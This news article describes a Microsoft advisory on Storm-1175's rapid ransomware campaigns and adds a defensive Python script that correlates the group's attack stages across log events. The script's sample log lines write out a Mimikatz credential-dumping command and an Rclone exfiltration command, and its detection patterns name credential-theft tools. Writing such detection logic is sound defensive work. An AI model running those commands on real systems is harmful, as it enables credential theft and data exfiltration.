Microsoft Warns Chinese Hackers Are Exploiting Zero-Days In Under 24 Hours

Storm-1175 disables antivirus, steals credentials, and deploys Medusa ransomware, sometimes before vulnerabilities have even been officially disclosed.

Published on Apr 7, 2026
Microsoft Warns Storm-1175 Is Exploiting Zero-Days to Deploy Medusa Ransomware Within 24 Hours

A China-linked, financially motivated threat group tracked by Microsoft as Storm-1175 has been observed running rapid ransomware campaigns that exploit newly disclosed vulnerabilities, usually within days of public disclosure and sometimes within 24 hours.

According to a new advisory from Microsoft Threat Intelligence, the group targets unpatched, internet-facing systems using “N-day” vulnerabilities: flaws that are publicly known but not yet widely remediated. In some cases the actor has also exploited zero-day vulnerabilities before disclosure.

Researchers have observed the group exploiting more than 16 vulnerabilities since 2023, including flaws in Microsoft Exchange, Ivanti products, and remote management tools. Most recently, Storm-1175 exploited CVE-2026-23760, an authentication bypass in SmarterMail, and CVE-2025-10035 in GoAnywhere MFT, both as zero-days before patches were available.

Rapid Exploitation and Lateral Movement

Once initial access is gained, Storm-1175 moves quickly. In some incidents the group went from entry to ransomware deployment in under a day, though most intrusions unfolded over five to six days.

The attackers establish persistence by creating administrative accounts, then move laterally using legitimate tools (such as PowerShell and PsExec) and RMM software like Atera and AnyDesk. These tools are routinely used by IT teams, which lets attacker activity blend in with legitimate administration.

Credential theft is a key step, Microsoft warned. Storm-1175 uses tools such as Mimikatz and Impacket to harvest credentials from process memory and from the Active Directory database, then reuses them to reach systems of interest. The group also disables or modifies antivirus protections to evade detection.

Before deploying the Medusa ransomware payload, the attackers typically stage stolen data with Bandizip and exfiltrate it with Rclone. This sets up double extortion: systems are encrypted, and the victim is also threatened with a leak of the stolen data.
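The stages above (new admin account, PsExec or RMM lateral movement, credential dumping, antivirus tampering, Bandizip staging, Rclone transfer) are individually noisy but collectively distinctive, and the advisory's key point is that they can all land within a day. The following is an added detection example written for this page; it is not code from Microsoft's advisory or from any product. It tags constructed sample log lines (the `host|timestamp|source|message` format and the hostnames are assumed for illustration; the Windows event IDs 4720, 4732, 7045 and Defender 5001 are the standard ones) and raises an alert when at least three distinct playbook stages appear within a 24-hour window, across hosts, since the actor moves laterally and a per-host view would miss the chain.

```python
import re
from datetime import datetime, timedelta
from itertools import takewhile

# Constructed sample telemetry (not real data): host|UTC timestamp|log source|message.
# Two hosts show the full chain on 2026-04-01; wks-042 shows isolated benign-looking events.
SAMPLE_EVENTS = [
    "srv-mail01|2026-04-01T02:10:05|Security|4720 A user account was created. Account Name: svcbackup",
    "srv-mail01|2026-04-01T02:10:40|Security|4732 A member was added to a security-enabled local group. Group Name: Administrators Member Name: svcbackup",
    "srv-mail01|2026-04-01T02:35:12|Sysmon|1 Process Create: C:\\Windows\\Temp\\mimikatz.exe CommandLine: mimikatz.exe sekurlsa::logonpasswords",
    "srv-mail01|2026-04-01T03:01:00|Defender|5001 Microsoft Defender Antivirus Real-time Protection is disabled",
    "fs01|2026-04-01T03:20:00|System|7045 A service was installed in the system. Service Name: PSEXESVC",
    "fs01|2026-04-01T04:05:33|Sysmon|1 Process Create: C:\\Program Files\\Bandizip\\Bandizip.exe CommandLine: bc c -y D:\\share\\finance.zip D:\\share\\finance",
    "fs01|2026-04-01T04:40:10|Sysmon|1 Process Create: C:\\Users\\svcbackup\\rclone.exe CommandLine: rclone copy D:\\share\\finance.zip remote:exfil -P",
    "wks-042|2026-03-20T09:00:00|Security|4720 A user account was created. Account Name: intern2",
    "wks-042|2026-03-28T10:00:00|Sysmon|1 Process Create: C:\\Program Files\\AnyDesk\\AnyDesk.exe CommandLine: AnyDesk.exe --install",
]

# One pattern per playbook stage from the advisory, matched against the message field only.
# 4720/4732: account created / added to Administrators; 7045 PSEXESVC: PsExec service install;
# Defender 5001: real-time protection disabled. First matching stage wins.
STAGE_PATTERNS = [
    ("persistence:new-admin", re.compile(r"\b4732\b.*\bAdministrators\b|\b4720\b", re.I)),
    ("lateral:psexec", re.compile(r"\b7045\b.*\bPSEXESVC\b", re.I)),
    ("lateral:rmm", re.compile(r"\b(anydesk|atera)", re.I)),
    ("credential-theft", re.compile(r"mimikatz|sekurlsa|secretsdump|ntds\.dit", re.I)),
    ("defense-evasion:av-disabled", re.compile(r"\b5001\b|DisableRealtimeMonitoring", re.I)),
    ("exfil:staging", re.compile(r"bandizip", re.I)),
    ("exfil:transfer", re.compile(r"\brclone\b", re.I)),
]


def parse_event(line):
    """Split one pipe-delimited sample line into a dict with a parsed timestamp."""
    host, ts, source, message = line.split("|", 3)
    return {"host": host, "time": datetime.fromisoformat(ts), "source": source, "message": message}


def tag_event(message):
    """Return the playbook stage a log message indicates, or None if it matches nothing."""
    for stage, pattern in STAGE_PATTERNS:
        if pattern.search(message):
            return stage
    return None


def correlate(lines, window_hours=24, min_stages=3):
    """Greedy sliding window over tagged events sorted by time: each group holds every
    tagged event within window_hours of the group's first event. A group becomes an
    alert when it covers at least min_stages distinct stages. Hosts are pooled so a
    chain that hops from a mail server to a file server is still seen as one intrusion."""
    tagged = []
    for line in lines:
        ev = parse_event(line)
        stage = tag_event(ev["message"])
        if stage:
            ev["stage"] = stage
            tagged.append(ev)
    tagged.sort(key=lambda e: e["time"])

    window = timedelta(hours=window_hours)
    alerts = []
    i = 0
    while i < len(tagged):
        start = tagged[i]["time"]
        group = list(takewhile(lambda e: e["time"] - start <= window, tagged[i:]))
        stages = {e["stage"] for e in group}
        if len(stages) >= min_stages:
            alerts.append({
                "first_seen": start,
                "last_seen": group[-1]["time"],
                "hosts": sorted({e["host"] for e in group}),
                "stages": sorted(stages),
            })
        i += len(group)  # the next window starts after this group
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        span = alert["last_seen"] - alert["first_seen"]
        print(f"ALERT hosts={alert['hosts']} stages={len(alert['stages'])} span={span}")
        for stage in alert["stages"]:
            print("  -", stage)
```

On the sample data the isolated account creation and AnyDesk install on wks-042 never reach the three-stage threshold, while the srv-mail01 to fs01 chain produces one alert covering six stages in about two and a half hours. In a real deployment the patterns would be replaced by your SIEM's field-level matches, and the window should be tuned against the five-to-six-day dwell the advisory reports as typical, with the 24-hour figure as the worst case.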

Storm-1175’s playbook rests on a single assumption: that most organizations will not patch internet-facing systems before an attacker can exploit a newly disclosed flaw. For security leaders, the advisory is a prompt to measure how quickly their teams move from disclosure to remediation on perimeter-facing products, particularly mail servers, managed file transfer tools, and RMM platforms.

Organizations in healthcare, education, finance, and professional services should treat exposure windows as active threat periods, not just compliance checkboxes.